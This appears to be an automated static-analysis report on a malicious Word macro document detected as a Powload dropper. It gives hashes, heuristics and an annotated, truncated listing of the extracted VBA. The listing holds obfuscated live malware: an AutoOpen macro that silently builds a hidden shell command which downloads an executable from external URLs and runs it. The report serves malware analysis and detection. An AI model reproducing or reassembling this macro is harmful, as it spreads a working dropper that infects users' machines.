Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 baf5644ed7bf7356…

MALICIOUS

Office (OLE)

Size: 73.1 KB · Created: 2018-09-03 11:15:00 · Authoring application: Microsoft Office Word · First seen: 2019-05-16
MD5: 4ec24c38d01802b038ef5c87897e250b
SHA-1: 279e266ea5e3aac629295adc1df96b64829d804f
SHA-256: baf5644ed7bf7356615b8118cbec8b4754b3fbd1d69e2c067003d8b93d81d435
Risk Score: 202

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro uses the Shell() function to execute a command, most likely to download and run a secondary payload. The ClamAV detection name 'Doc.Dropper.Powload-6670769-0' further supports its role as a dropper. The specific command the VBA script builds is too heavily obfuscated to reconstruct fully (it is assembled at run time from short string fragments spread across several helper functions; see the extracted macro below), but its intent is clear.

Heuristics (6)

  • ClamAV: Doc.Dropper.Powload-6670769-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Powload-6670769-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5147 bytes
SHA-256: 25e65ad1d0e19a60d99916ec73025c8c382e0614a94718e946c4bede45529fda
Preview script
First 1,000 lines of the extracted script
' Module header from the decoded VBA source. VB_Base = "1Normal.ThisDocument"
' together with VB_PredeclaredId = True is consistent with this being the
' document's ThisDocument class module; VB_Name is a randomized identifier
' rather than a meaningful module name.
Attribute VB_Name = "mOiOWtjlRGEqz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-executing entry point: Word runs AutoOpen when the document is opened.
' The whole body sits under a line-continued On Error Resume Next, so the
' Hour calls (Hour expects a time value; these string arguments are not times
' and presumably raise a type-mismatch error) are silently swallowed and serve
' only as padding/obfuscation around the single meaningful statement.
Sub AutoOpen()
On _
Error _
Resume _
Next
   Hour "waLVlBTpcfZp" + "jIwaYXpYTwGaz" + "6721" + "mj"
   Hour "mZ" + "Zz" + "a" + "BMZzvXC"
' The command line is assembled at run time: KeyString() with an arithmetically
' hidden argument supplies the leading characters, followed by the return values
' of seven helper functions (vnwiaSvkPs and vsjJsvOEk appear below; the other
' five are not visible in the truncated preview). The second Shell argument
' evaluates to 0 (vbHide), so the spawned process gets no visible window.
VBA.Shell KeyString(1 + 1 + 6 + 6 + 53) + zzBRfwBYEjWaBj + QCVwfERcbFu + vnwiaSvkPs + vsjJsvOEk + djvQmF + hFZkZqwirQdXzl + XFrrYWhiwUufZp, 85 - 85
   Hour "392901315" + "iz"
   Hour "sKB" + "1157"
   Hour "P" + "141548016"
End Sub



' Second module in the decoded source, again with a randomized name; it holds
' the string-building helper functions that AutoOpen concatenates into the
' Shell command.
Attribute VB_Name = "rbfTcfDzDtXK"
' Helper returning one slice of the command line built in AutoOpen. Nine local
' strings are assembled from short literal fragments and concatenated into the
' return value near the end; the interleaved Hour calls are padding that only
' survives because of On Error Resume Next, exactly as in AutoOpen. The many
' caret (^) characters and the "md /V/" + "C" prefix are consistent with a
' caret-escaped cmd.exe command line, and Chr() of an arithmetic sum hides a
' single character; the fragments are deliberately not decoded in this preview.
Function vnwiaSvkPs()

On _
Error _
Resume _
Next
Hour "PjtjzId" + "101243122"
   Hour "448" + "pfjMo" + "519588971" + "jTbSH"
   Hour "wlX" + "MjiIkWOorwMn" + "360281189" + "fiKBUdimSmfjZO"
zMslGJ = "md /V/" + "C" + Chr(4 + 5 + 1 + 2 + 22) + "^s^et" + " ^U" + "J=^    " + "^  ^ ^" + "  " + "  ^   ^" + " ^  ^}^" + "}{^" + "hc^t^a" + "c}^;^k" + "a" + "er"
Hour "9149464" + "JuiPaEONMJaYKi"
   Hour "wZiWwMzvYaDEln" + "OjSz" + "WwKMBNNcv" + "W"
   Hour "88703812" + "GzXFpZ"
   Hour "IsEtwDbL" + "iBc"
EazrLpRzsl = "^b^;iE" + "^z" + "$^ " + "m^et" + "^I^-" + "ekovn^I" + "^;)" + "iEz$"
Hour "YX" + "Bb"
YBIjUnock = "^ ^," + "AZ" + "Q$(el" + "i^Fd^ao" + "^"
Hour "UkzV" + "443443375"
KDlpRIZ = "lnwoD^" + ".^" + "b^t^" + "T${yrt" + "^{)O^" + "SU^$ n" + "^i^ AZ^" + "Q$"
Hour "4149" + "wG"
   Hour "Q" + "b"
DaajuwukLWi = "(^hc" + "^ae" + "r^o^f^;" + "^'e" + "^xe" + "^.'+^PQ" + "r^$" + "^+^'" + "^\^'^" + "+cilbup" + ":vne^" + "$" + "=^i^E"
Hour "198927999" + "qfuVldzMuiu"
   Hour "44365992" + "3034" + "Ko" + "56341495"
dXpdJNUDzW = "^z" + "$;^'^25" + "^5^' ^" + "= P^Q" + "r" + "$^;)^'@" + "'(t" + "i^lpS^."
Hour "409008215" + "1969" + "307815277" + "9456"
Hacbljizh = "^'" + "wA^l^" + "K^m2D9" + "/ia1^p-" + "-n^x^"
Hour "8413" + "jiiF"
   Hour "sM" + "XHCHZsKSKol"
phALirqOuLu = ".lp" + "e^eib^" + "5^a^" + "b^fb" + "a" + "1"
Hour "SDoOatJRRSNSL" + "zp"
   Hour "IR" + "8728" + "jSb" + "Js"
   Hour "160" + "416393140" + "zBAsWXwAM" + "oYUdbK"
   Hour "524232069" + "tEEN"
jZAbDhHSmJ = "b^" + "-" + "^-n" + "^x//:pt" + "t^h^" + "@f" + "^" + "7"
' Assigning to the function name sets the return value: the nine fragments
' joined in the order they were defined above.
vnwiaSvkPs = zMslGJ + EazrLpRzsl + YBIjUnock + KDlpRIZ + DaajuwukLWi + dXpdJNUDzW + Hacbljizh + phALirqOuLu + jZAbDhHSmJ
   Hour "AJtkR" + "XFuz"
   Hour "454255615" + "H" + "129906426" + "664"
   Hour "njPj" + "a" + "Qi" + "dM"
End Function
Function vsjJsvOEk()

On _
Error _
Resume _
Next
Hour "414068439" + "1912" + "6606" + "Lhjo"
   Hour "nGiSEZXpWrmV" + "rbKbuAPovnJp" + "38225789" + "qFQWjGqAjzMjRp"
   Hour "642" + "liYV" + "KDW" + "nJd"
VfKXlwfIfw = "VRQ^k^H" + "/" + "^ur^.^k" + "^i^" + "timc//:" + "^p^t^t^" + "h@ke" + "s^P3" + "^d/" + "r^b^.m"
Hour "Ttj" + "a"
   Hour "3356" + "jRY" + "H" + "fqHczv"
   Hour "YMPc" + "DsSY"
GFClXuqciwH = "^" + "oc^.^" + "avi^tc^" + "enocr" + "^e"
Hour "J" + "ETbQmRsKJ"
   Hour "495940740" + "JsKUif" + "9213" + "rjnDJGiWL"
fPLTEGI = "^t" + "n^i//" + "^" + ":^p" + "t^th@"
Hour "ciAVpUnBJknY" + "923"
   Hour "apRtiMnmh" + "341892734"
   Hour "fFIjq" + "299500210" + "BztQvKr" + "EoWYfW"
kjqdaPui = "^u0^" + "Ozr9^" + "w" + "/" + "moc.ecs" + "iped/"
Hour "p" + "341678073"
   Hour "Dnk" + "bjjfSP"
   Hour "1352" + "48910898"
JBwwkcPmjD = "/^:ptth" + "^@Z/m" + "oc.n^eh" + "sahkl^a" + "//^"
Hour "NtzVDaXiMzd" + "w"
   Hour "bVO" + "ESjD"
   Hour "iIk" + "h"
   Hour "281174876" + "iO" + "RATPzjw" + "71153388"
   Hour "298306037" + "AS" + "BPdp" + "dIlpHVqi"
ztUiwzpAj = ":^p^" + "tt^h'^=" + "OS^U^$;" + "tn^" + "e^i^lC" + "^b" + "e^W" + "^.t^eN "
Hour "JIllhVEJk" + "491394751" + "4698" + "wrPzHsfd"
ENCTDZBGaW = "t" + "ce" + "j^bo-^" + "w^e" + "n=bt^" + "T^$^" + " l^" + "le" + "hsr^" + "e^w^op"
Hour "962" + "tXUU" + "Go" + "naUA"
TdsTrUSz = "&" + "&f" + "or " + "/^L %^9" + " ^in" + " (36" + "4^,"
vsjJsvOEk = VfKXlwfIfw + GFClXuqciwH + fPLTEGI + kjqdaPui + JBwwkcPmjD + ztUiwzpAj + ENCTDZBGaW + TdsTrUSz
   Hour
... (truncated)